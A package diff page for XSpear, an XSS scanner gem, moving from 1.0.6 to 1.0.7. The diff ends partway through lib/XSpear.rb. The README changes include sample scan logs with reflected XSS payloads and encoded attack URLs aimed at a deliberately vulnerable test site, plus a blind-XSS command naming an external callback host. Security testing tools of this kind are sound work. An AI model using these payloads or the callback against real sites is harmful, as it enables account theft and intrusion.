XSpear 1.0.6 → 1.0.7

Sign up to get free protection for your applications and to get access to all the features.
Files changed (7) hide show
  1. checksums.yaml +4 -4
  2. data/.idea/workspace.xml +65 -42
  3. data/README.md +98 -67
  4. data/lib/XSpear/XSpearRepoter.rb +2 -2
  5. data/lib/XSpear/version.rb +1 -1
  6. data/lib/XSpear.rb +13 -13
  7. metadata +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 79c560a49f42b36d468188a502f3b8c16f78b2b0c8a11af550deeb083978529e
4
- data.tar.gz: d64291c47fddcee3d326ad2cb1db999c52fd992e3baf954b1b6fcdd47137f773
3
+ metadata.gz: 0c0ac315484162b92f2f958d2ddc70736bec0f164349575529e763f154366c37
4
+ data.tar.gz: eab6a1c2350ea1bf4467fcd41cfd00a61c58d1693503e4437ae86418e348bda1
5
5
  SHA512:
6
- metadata.gz: 3af5242c09f427957569d96ab94f239f774471594d127e4f33ca3c92db2ef1787cf59adbad739c18944340635dbe6f3b5cb10261d2d9e144379505e5356a85b5
7
- data.tar.gz: 4b2d8e9715b15fe2637d20655837e084d59dafbda2472ecc31a135dd8d3ee3469742c8d81cd8c372c323038d5ec07d70dafca7fb3bf2f5da4b1e758513e13256
6
+ metadata.gz: e4463bb21d6b1cf918c290d7a3540d93510f4f9cb68ebc6fad7319377d579228aa754b832e5d077f63e24b35d2ea73fa492a4a21351c0f26880b6c1f52065016
7
+ data.tar.gz: bf64aa0df617fdddfb8d07803a8dbba0bb2822579b56fbc93a0d17f73aced699ad2f46bfd01a51ae9e614d3287b016e2419eaba35384e17d76c038c3ea52d567
data/.idea/workspace.xml CHANGED
@@ -3,7 +3,10 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
+ <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
6
7
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
+ <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
7
10
  </list>
8
11
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
9
12
  <option name="SHOW_DIALOG" value="false" />
@@ -16,41 +19,37 @@
16
19
  </component>
17
20
  <component name="FileEditorManager">
18
21
  <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
19
- <file pinned="false" current-in-tab="false">
20
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
21
- <provider selected="true" editor-type-id="text-editor">
22
- <state relative-caret-position="525">
23
- <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
24
- </state>
25
- </provider>
26
- </entry>
27
- </file>
28
22
  <file pinned="false" current-in-tab="false">
29
23
  <entry file="file://$PROJECT_DIR$/README.md">
30
24
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
31
25
  <state split_layout="SPLIT">
32
- <first_editor relative-caret-position="599">
33
- <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
26
+ <first_editor relative-caret-position="2113">
27
+ <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
34
28
  </first_editor>
35
29
  <second_editor />
36
30
  </state>
37
31
  </provider>
38
32
  </entry>
39
33
  </file>
40
- <file pinned="false" current-in-tab="true">
34
+ <file pinned="false" current-in-tab="false">
35
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
36
+ <provider selected="true" editor-type-id="text-editor" />
37
+ </entry>
38
+ </file>
39
+ <file pinned="false" current-in-tab="false">
41
40
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
42
41
  <provider selected="true" editor-type-id="text-editor">
43
- <state relative-caret-position="370">
44
- <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
42
+ <state relative-caret-position="426">
43
+ <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
45
44
  </state>
46
45
  </provider>
47
46
  </entry>
48
47
  </file>
49
- <file pinned="false" current-in-tab="false">
48
+ <file pinned="false" current-in-tab="true">
50
49
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
51
50
  <provider selected="true" editor-type-id="text-editor">
52
- <state relative-caret-position="392">
53
- <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
51
+ <state relative-caret-position="253">
52
+ <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
54
53
  </state>
55
54
  </provider>
56
55
  </entry>
@@ -113,10 +112,10 @@
113
112
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
114
113
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
115
114
  <option value="$PROJECT_DIR$/exe/XSpear" />
116
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
115
  <option value="$PROJECT_DIR$/README.md" />
118
- <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
116
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
119
117
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
118
+ <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
120
119
  </list>
121
120
  </option>
122
121
  </component>
@@ -231,7 +230,7 @@
231
230
  <workItem from="1562942816004" duration="15337000" />
232
231
  <workItem from="1563638656518" duration="4985000" />
233
232
  <workItem from="1563809961097" duration="4237000" />
234
- <workItem from="1563893538891" duration="2230000" />
233
+ <workItem from="1563893538891" duration="3583000" />
235
234
  </task>
236
235
  <task id="LOCAL-00001" summary="init update">
237
236
  <created>1562945899597</created>
@@ -478,17 +477,38 @@
478
477
  <option name="project" value="LOCAL" />
479
478
  <updated>1563895638242</updated>
480
479
  </task>
481
- <option name="localTasksCounter" value="36" />
480
+ <task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
481
+ <created>1563895850670</created>
482
+ <option name="number" value="00036" />
483
+ <option name="presentableId" value="LOCAL-00036" />
484
+ <option name="project" value="LOCAL" />
485
+ <updated>1563895850670</updated>
486
+ </task>
487
+ <task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
488
+ <created>1563896026689</created>
489
+ <option name="number" value="00037" />
490
+ <option name="presentableId" value="LOCAL-00037" />
491
+ <option name="project" value="LOCAL" />
492
+ <updated>1563896026689</updated>
493
+ </task>
494
+ <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
495
+ <created>1563896886094</created>
496
+ <option name="number" value="00038" />
497
+ <option name="presentableId" value="LOCAL-00038" />
498
+ <option name="project" value="LOCAL" />
499
+ <updated>1563896886094</updated>
500
+ </task>
501
+ <option name="localTasksCounter" value="39" />
482
502
  <servers />
483
503
  </component>
484
504
  <component name="TimeTrackingManager">
485
- <option name="totallyTimeSpent" value="26789000" />
505
+ <option name="totallyTimeSpent" value="28142000" />
486
506
  </component>
487
507
  <component name="ToolWindowManager">
488
508
  <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
489
509
  <editor active="true" />
490
510
  <layout>
491
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
511
+ <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
492
512
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
493
513
  <window_info id="Favorites" order="2" side_tool="true" />
494
514
  <window_info anchor="bottom" id="Message" order="0" />
@@ -501,7 +521,7 @@
501
521
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
502
522
  <window_info anchor="bottom" id="Database Changes" order="8" />
503
523
  <window_info anchor="bottom" id="Version Control" order="9" />
504
- <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
524
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
505
525
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
506
526
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
507
527
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -514,9 +534,6 @@
514
534
  <option name="version" value="1" />
515
535
  </component>
516
536
  <component name="VcsManagerConfiguration">
517
- <MESSAGE value="init update" />
518
- <MESSAGE value="build gem and edit dependency" />
519
- <MESSAGE value="add gem &amp; edit code" />
520
537
  <MESSAGE value="edit gem dependency(runtime, developement)" />
521
538
  <MESSAGE value="Add json report and new build binary, edit readme" />
522
539
  <MESSAGE value="Add screenshot images" />
@@ -539,7 +556,10 @@
539
556
  <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
540
557
  <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
541
558
  <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
542
- <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit report &amp; scanning format" />
559
+ <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
560
+ <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
561
+ <MESSAGE value="(1.0.6) Edit README.md" />
562
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit README.md" />
543
563
  </component>
544
564
  <component name="editorHistoryManager">
545
565
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -576,13 +596,6 @@
576
596
  </state>
577
597
  </provider>
578
598
  </entry>
579
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
580
- <provider selected="true" editor-type-id="text-editor">
581
- <state relative-caret-position="15">
582
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
583
- </state>
584
- </provider>
585
- </entry>
586
599
  <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
587
600
  <provider selected="true" editor-type-id="text-editor">
588
601
  <state relative-caret-position="105">
@@ -596,27 +609,37 @@
596
609
  <entry file="file:///usr/local/bin/rake">
597
610
  <provider selected="true" editor-type-id="text-editor" />
598
611
  </entry>
612
+ <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
613
+ <provider selected="true" editor-type-id="text-editor" />
614
+ </entry>
599
615
  <entry file="file://$PROJECT_DIR$/README.md">
600
616
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
601
617
  <state split_layout="SPLIT">
602
- <first_editor relative-caret-position="599">
603
- <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
618
+ <first_editor relative-caret-position="2113">
619
+ <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
604
620
  </first_editor>
605
621
  <second_editor />
606
622
  </state>
607
623
  </provider>
608
624
  </entry>
609
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
625
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
610
626
  <provider selected="true" editor-type-id="text-editor">
611
- <state relative-caret-position="392">
612
- <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
627
+ <state relative-caret-position="15">
628
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
613
629
  </state>
614
630
  </provider>
615
631
  </entry>
616
632
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
617
633
  <provider selected="true" editor-type-id="text-editor">
618
- <state relative-caret-position="370">
619
- <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
634
+ <state relative-caret-position="426">
635
+ <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
636
+ </state>
637
+ </provider>
638
+ </entry>
639
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
640
+ <provider selected="true" editor-type-id="text-editor">
641
+ <state relative-caret-position="253">
642
+ <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
620
643
  </state>
621
644
  </provider>
622
645
  </entry>
data/README.md CHANGED
@@ -10,9 +10,12 @@ XSpear is XSS Scanner on ruby gems
10
10
  + Reflected Params
11
11
  + Filtered test `event handler` `HTML tag` `Special Char`
12
12
  - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
13
+ - Dynamic/Static Analysis
14
+ + Find SQL Error pattern
15
+ + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
16
+ + Analysis Other headers..(Server version, Content-Type, etc...)
13
17
  - XSpear running on ruby code(with Gem library)
14
- - Dynamic/Static Analysis(Find SQL Error, etc..)
15
- - Show table base report and testing raw query(url)
18
+ - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
16
19
  - Testing at selected parameters
17
20
  - Support output format `cli` `json`
18
21
  + cli: summary, filtered rule(params), Raw Query
@@ -99,80 +102,100 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
99
102
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
100
103
  ```
101
104
 
105
+ **set thread**
106
+ ```
107
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
108
+ ```
109
+
102
110
  **testing at selected parameters**
103
111
  ```
104
112
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
105
113
  ```
106
114
 
115
+ **testing blind xss**
116
+ ```
117
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
118
+ ```
119
+
107
120
  etc...
108
121
 
109
122
  ### Sample log
110
123
  **Scanning XSS**
111
124
  ```
112
- $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
113
- ) (
114
- ( /( )\ )
115
- )\())(()/( ( ) (
116
- ((_)\ /(_))` ) ))\ ( /( )(
117
- __((_)(_)) /(/( /((_))(_))(()\
118
- \ \/ // __|((_)_\ (_)) ((_)_ ((_)
119
- > < \__ \| '_ \)/ -_)/ _` || '_|
120
- /_/\_\|___/| .__/ \___|\__,_||_| />
121
- |_| \ /<
122
- {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
123
- / \<
124
- \> [ v1.0.5 ]
125
- [*] creating a test query.
126
- [*] test query generation is complete. [138 query]
127
- [*] starting test and analysis. [10 threads]
128
- [I] [01:44:06] [param: cat][Found SQL Error Pattern]
129
- [I] [01:44:06] reflected rEfe6[param: cat][reflected parameter]
130
- [I] [01:44:08] reflected onhwul=64[param: cat][not filtered event handler on{any} pattern]
131
- [-] [01:44:14] not reflected <svg/onload=alert(45)>
132
- [H] [01:44:14] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
133
- [H] [01:44:15] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
134
- [-] [01:44:15] not reflected <img/src onerror=alert(45)>
135
- [-] [01:44:20] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
136
- =>
137
- [-] [01:44:21] not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
138
- =>
139
- [V] [01:44:21] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
140
- => [param: cat][triggered <script>alert(45)</script>]
141
- [-] [01:44:22] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
142
- =>
143
- [V] [01:44:22] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
144
- => [param: cat][triggered <svg/onload=alert(45)>]
145
- [-] [01:44:23] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
146
- =>
147
- [*] finish scan. the report is being generated..
148
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
149
- | [ XSpear report ] |
150
- | http://testphp.vulnweb.com/listproducts.php?cat=z |
151
- | 2019-07-23 01:44:05 +0900 ~ 2019-07-23 01:44:23 +0900 Found 7 issues. |
152
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
153
- | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
154
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
155
- | 0 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
- | 1 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
157
- | 2 | INFO | FILERD RULE | cat | onhwul=64 | not filtered event handler on{any} pattern |
158
- | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
159
- | 4 | HIGH | XSS | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
160
- | 5 | VULN | XSS | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
161
- | 6 | VULN | XSS | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
162
- +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
163
- < Not Filtered >
164
- [cat] param
165
- + Special Char: `,\,<,|,(,;,>,',),+,-,{,.,],,,[,},:,=,$
166
- + Event Handler: "onAfterUpdate","onAbort","onBeforeCut","onAfterPrint","onBeforeActivate","onActivate","onBeforeCopy","onBeforeUpdate","onBeforeEditFocus","onBeforeDeactivate","onBlur","onBounce","onCellChange","onBegin","onBeforePrint","onBeforeUnload","onBeforePaste","onCut","onContextMenu","onCopy","onDataSetComplete","onClick","onDblClick","onControlSelect","onDataSetChanged","onChange","onDataAvailable","onDragEnd","onDragOver","onDrag","onDragLeave","onDragStart","onDeactivate","onDragEnter","onDragDrop","onDrop","onEnd","onFinish","onHashChange","onFocusIn","onErrorUpdate","onHelp","onFocusOut","onInput","onFocus","onError","onFilterChange","onMouseDown","onKeyPress","onMediaComplete","onLayoutComplete","onMediaError","onKeyUp","onMessage","onKeyDown","onLoad","onLoseCapture","onMouseEnter","onMouseUp","onMouseLeave","onMove","onMoveEnd","onMoveStart","onMouseOver","onMouseMove","onMouseOut","onMouseWheel","onProgress","onOutOfSync","onPopState","onPropertyChange","onOffline","onOnline","onRedo","onPaste","onReadyStateChange","onPause","onResizeStart","onRowExit","onResume","onRowDelete","onRepeat","onReset","onResizeEnd","onReverse","onRowsEnter","onResize","onSelectionChange","onSyncRestored","onStart","onStop","onStorage","onRowInserted","onSelect","onSelectStart","onScroll","onSeek","onTrackChange","onUnload","onURLFlip","onSubmit","onTimeError","onUndo"
167
- + HTML Tag: "script","iframe"
168
- < Raw Query >
169
- [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
170
- [1] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
171
- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
172
- [3] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
173
- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
174
- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
175
- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
125
+ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
126
+ ) (
127
+ ( /( )\ )
128
+ )\())(()/( ( ) (
129
+ ((_)\ /(_))` ) ))\ ( /( )(
130
+ __((_)(_)) /(/( /((_))(_))(()\
131
+ \ \/ // __|((_)_\ (_)) ((_)_ ((_)
132
+ > < \__ \| '_ \)/ -_)/ _` || '_|
133
+ /_/\_\|___/| .__/ \___|\__,_||_| />
134
+ |_| \ /<
135
+ {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
136
+ / \<
137
+ \> [ v1.0.6 ]
138
+ [*] creating a test query.
139
+ [*] test query generation is complete. [149 query]
140
+ [*] starting test and analysis. [10 threads]
141
+ [I] [00:37:34] reflected 'XsPeaR
142
+ [-] [00:37:34] 'cat' Not reflected |XsPeaR
143
+ [I] [00:37:34] [param: cat][Found SQL Error Pattern]
144
+ [-] [00:37:34] 'STATIC' not reflected
145
+ [I] [00:37:34] reflected "XsPeaR
146
+ [-] [00:37:34] 'cat' Not reflected ;XsPeaR
147
+ [I] [00:37:34] reflected `XsPeaR
148
+ ...snip...
149
+ [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
150
+ [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)>
151
+ [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)>
152
+ [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
153
+ [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
154
+ [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
155
+ [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
156
+ [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
157
+ => [param: cat][triggered <script>alert(45)</script>]
158
+ [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
159
+ => [param: cat][triggered <svg/onload=alert(45)>]
160
+ [*] finish scan. the report is being generated..
161
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
162
+ | [ XSpear report ] |
163
+ | http://testphp.vulnweb.com/listproducts.php?cat=z |
164
+ | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. |
165
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
166
+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION |
167
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
168
+ | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern |
169
+ | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 |
170
+ | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS |
171
+ | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html |
172
+ | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options |
173
+ | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP |
174
+ | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter |
175
+ | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern |
176
+ | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code |
177
+ | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
178
+ | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
179
+ | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
180
+ +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
181
+ < Available Objects >
182
+ [cat] param
183
+ + Available Special Char: ' \ ` ] . : ) } [ { $
184
+ + Available Event Handler: "onActivate","onBeforeCopy","onAfterPrint","onAfterUpdate","onAbort","onBeforeActivate","onBeforeDeactivate","onBlur","onBeforeCut","onBounce","onBeforeUnload","onBeforeEditFocus","onBeforePaste","onBeforeUpdate","onBegin","onBeforePrint","onClick","onChange","onControlSelect","onDataSetChanged","onCopy","onDataSetComplete","onContextMenu","onDataAvailable","onCellChange","onCut","onDeactivate","onDblClick","onDragEnd","onDragOver","onDragDrop","onDrop","onDragStart","onDrag","onDragEnter","onDragLeave","onFilterChange","onFocusIn","onEnd","onHelp","onError","onErrorUpdate","onFocus","onFinish","onHashChange","onFocusOut","onLoad","onLoseCapture","onInput","onLayoutComplete","onKeyDown","onMessage","onKeyUp","onMediaError","onMediaComplete","onKeyPress","onMouseOver","onMove","onMouseEnter","onMouseWheel","onMouseLeave","onMoveEnd","onMouseDown","onMouseMove","onMouseUp","onMouseOut","onPropertyChange","onMoveStart","onPaste","onPopState","onOutOfSync","onProgress","onOnline","onReadyStateChange","onOffline","onPause","onResize","onReverse","onRepeat","onRedo","onResizeEnd","onRowExit","onReset","onRowsEnter","onResizeStart","onResume","onRowInserted","onScroll","onStorage","onSelectStart","onRowDelete","onSeek","onSelectionChange","onSelect","onStart","onStop","onUndo","onTrackChange","onURLFlip","onTimeError","onSyncRestored","onSubmit","onUnload"
185
+ + Available HTML Tag: "svg","iframe","script","audio","video","meta","frame","img","embeded","frameset","object","style"
186
+ < Raw Query >
187
+ [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
188
+ [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
189
+ [2] http://testphp.vulnweb.com/listproducts.php?cat=z?-
190
+ [3] http://testphp.vulnweb.com/listproducts.php?cat=z?-
191
+ [4] http://testphp.vulnweb.com/listproducts.php?cat=z?-
192
+ [5] http://testphp.vulnweb.com/listproducts.php?cat=z?-
193
+ [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
194
+ [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
195
+ [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
196
+ [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
197
+ [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
198
+ [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
176
199
  ```
177
200
 
178
201
  **to JSON**
@@ -232,6 +255,14 @@ class ScanCallbackFunc()
232
255
  end
233
256
  ```
234
257
 
258
+ Common Callback Class
259
+ - CallbackXSSSelenium
260
+ - CallbackErrorPatternMatch
261
+ - CallbackCheckHeaders
262
+ - CallbackStringMatch
263
+ - CallbackNotAdded
264
+ etc...
265
+
235
266
  ## Update
236
267
  if nomal user
237
268
  ```
@@ -266,5 +297,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
266
297
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
267
298
 
268
299
  ## ScreenShot
269
- <img src="https://user-images.githubusercontent.com/13212227/61649243-14a30c80-acec-11e9-9a20-73839c4ec580.png" width=100%>
300
+ <img src="https://user-images.githubusercontent.com/13212227/61726530-bf7aff80-adac-11e9-9ed8-ac8ecd358c0c.png" width=100%>
270
301
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
data/lib/XSpear/XSpearRepoter.rb CHANGED
@@ -32,14 +32,14 @@ class XspearRepoter
32
32
  end
33
33
 
34
34
  def add_issue_first(type, issue, param, payload, pattern, description)
35
- rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
35
+ rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".red}
36
36
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
37
37
  @issue.insert(0,["-", rtype[type], rissue[issue], @method, param, pattern, description])
38
38
  @query.push payload
39
39
  end
40
40
 
41
41
  def add_issue(type, issue, param, payload, pattern, description)
42
- rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
42
+ rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".red}
43
43
  rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
44
44
  @issue << [@issue.size, rtype[type], rissue[issue], @method, param, pattern, description]
45
45
  @query.push payload
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.6"
2
+ VERSION = "1.0.7"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -78,28 +78,28 @@ class XspearScan
78
78
  def run
79
79
  if !@response['Server'].nil?
80
80
  # Server header
81
- @report.add_issue("i","s","-","-","original query","Found Server: #{@response['Server']}")
81
+ @report.add_issue("i","s","-","-","<original query>","Found Server: #{@response['Server']}")
